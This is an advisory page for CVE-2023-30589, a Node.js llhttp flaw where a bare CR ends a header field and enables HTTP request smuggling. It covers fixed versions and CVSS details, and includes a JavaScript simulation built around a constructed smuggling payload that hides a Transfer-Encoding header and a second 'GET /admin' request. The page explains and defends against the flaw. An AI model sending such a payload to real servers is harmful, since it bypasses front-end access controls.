HTTP Request Smuggling Vulnerability in Node.js by OpenJS Foundation
CVE-2023-30589

7.5 HIGH

Key Information:

Vendor: Nodejs (OpenJS Foundation)
Status: Vendor
CVE Published: 1 July 2023

What is CVE-2023-30589?

The llhttp parser used by the http module of Node.js (all release lines that were active at the time: 16, 18 and 20) does not strictly require the CRLF sequence to delimit HTTP header fields: a bare CR character, with no LF after it, is accepted as the end of a field. RFC 7230 section 3 allows only CRLF. The practical consequence is a parser differential. A front-end proxy that applies the CRLF rule and forwards the bytes unchanged sees a line such as "X-Ignore: a<CR>Transfer-Encoding: chunked" as a single header with a CR inside its value, while Node.js splits it into two headers and honours the second one. The two sides then disagree on where the request body ends, which is the precondition for HTTP Request Smuggling (HRS): the back end can be made to process a request that the front end never saw and never applied its access controls to. The rating below (Integrity High, Confidentiality and Availability None) reflects that effect. A front end that rejects bare CR in header values does not forward such a request, so the issue is only reachable behind a proxy that tolerates it.
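The differential described above, as an added illustration written for this page; it is not Node.js or llhttp code. Two toy header parsers are fed the same constructed request bytes: one follows RFC 7230 (CRLF only), the other also accepts a bare CR as a line terminator. The request, the X-Ignore header name and the host app.example are all invented for the example, and the simulated front end is assumed to forward a header value containing a bare CR unchanged.

```javascript
// Added example, not Node.js or llhttp code. Two toy HTTP/1.1 header parsers
// fed the same bytes: "strict" follows RFC 7230 (CRLF only), "lenient" also
// treats a bare CR as a line terminator, the llhttp behaviour behind
// CVE-2023-30589. Strings stand in for latin1 byte sequences.

// Parse the request line and header fields; report where the body starts.
function parseHeaders(raw, bareCR) {
  const end = raw.indexOf('\r\n\r\n');
  if (end < 0) throw new Error('incomplete header block');
  const head = raw.slice(0, end);
  // The only difference between the two parsers is this split.
  const lines = bareCR ? head.split(/\r\n?/) : head.split('\r\n');
  const headers = new Map();
  for (const line of lines.slice(1)) {
    const colon = line.indexOf(':');
    if (colon < 0) throw new Error(`malformed header line: ${JSON.stringify(line)}`);
    headers.set(line.slice(0, colon).trim().toLowerCase(), line.slice(colon + 1).trim());
  }
  return { requestLine: lines[0], headers, bodyStart: end + 4 };
}

// Number of body bytes that belong to the request (RFC 7230 section 3.3.3:
// Transfer-Encoding takes precedence over Content-Length when both appear).
function bodyLength(headers, body) {
  if ((headers.get('transfer-encoding') || '').toLowerCase() === 'chunked') {
    let pos = 0;
    for (;;) {
      const lineEnd = body.indexOf('\r\n', pos);
      if (lineEnd < 0) throw new Error('incomplete chunk');
      const size = parseInt(body.slice(pos, lineEnd), 16);
      if (Number.isNaN(size)) throw new Error('bad chunk size');
      pos = lineEnd + 2;
      if (size === 0) {
        // Last chunk; this toy decoder accepts no trailer fields.
        if (body.slice(pos, pos + 2) !== '\r\n') throw new Error('bad chunked terminator');
        return pos + 2;
      }
      pos += size + 2; // chunk data plus its trailing CRLF
    }
  }
  return parseInt(headers.get('content-length') || '0', 10);
}

// Cut a byte stream into requests the way one parser frames them.
function splitRequests(raw, bareCR) {
  const requests = [];
  let rest = raw;
  while (rest.length > 0) {
    const { requestLine, headers, bodyStart } = parseHeaders(rest, bareCR);
    const len = bodyLength(headers, rest.slice(bodyStart));
    requests.push({ requestLine, headers, body: rest.slice(bodyStart, bodyStart + len) });
    rest = rest.slice(bodyStart + len);
  }
  return requests;
}

// Constructed attacker request (invented for this example, not a captured
// sample; header name and host are made up). The bare CR after "a" hides
// "Transfer-Encoding: chunked" from a CRLF-only parser, so the front end
// frames the body by Content-Length while the back end uses chunked framing
// and treats the remainder of the body as a second request.
const SMUGGLED = 'GET /admin HTTP/1.1\r\nHost: app.example\r\n\r\n';
const BODY = '0\r\n\r\n' + SMUGGLED;
const ATTACKER_REQUEST =
  'POST /upload HTTP/1.1\r\n' +
  'Host: app.example\r\n' +
  `Content-Length: ${BODY.length}\r\n` +
  'X-Ignore: a\rTransfer-Encoding: chunked\r\n' +
  '\r\n' +
  BODY;

function frontEndView() { return splitRequests(ATTACKER_REQUEST, false); }
function backEndView() { return splitRequests(ATTACKER_REQUEST, true); }

// One line per parser: the request lines each side believes it received.
function summary() {
  return frontEndView().map(r => r.requestLine).join(' | ') +
    '  vs  ' + backEndView().map(r => r.requestLine).join(' | ');
}

console.log(summary());
```

Running it prints one request line for the strict side and two for the lenient side. The strict parser keeps the CR inside the X-Ignore value and never sees a Transfer-Encoding header, so it forwards the whole Content-Length body as one request; the lenient parser sees the chunked header, ends the first body at the zero chunk, and parses "GET /admin" as a fresh request. A front end that rejected the bare CR instead of forwarding it would stop the differential at the edge.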

Affected Version(s)

Node.js 16.x, 18.x and 20.x, the release lines named in the description above. The fixes shipped in the Node.js security release of June 2023 as 16.20.1, 18.16.1 and 20.3.1; deployments on any earlier release of those lines should upgrade.


CVSS V3.1

Score: 7.5
Severity: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: High
Availability: None

Timeline

  • Vulnerability published: 1 July 2023

  • Vulnerability reserved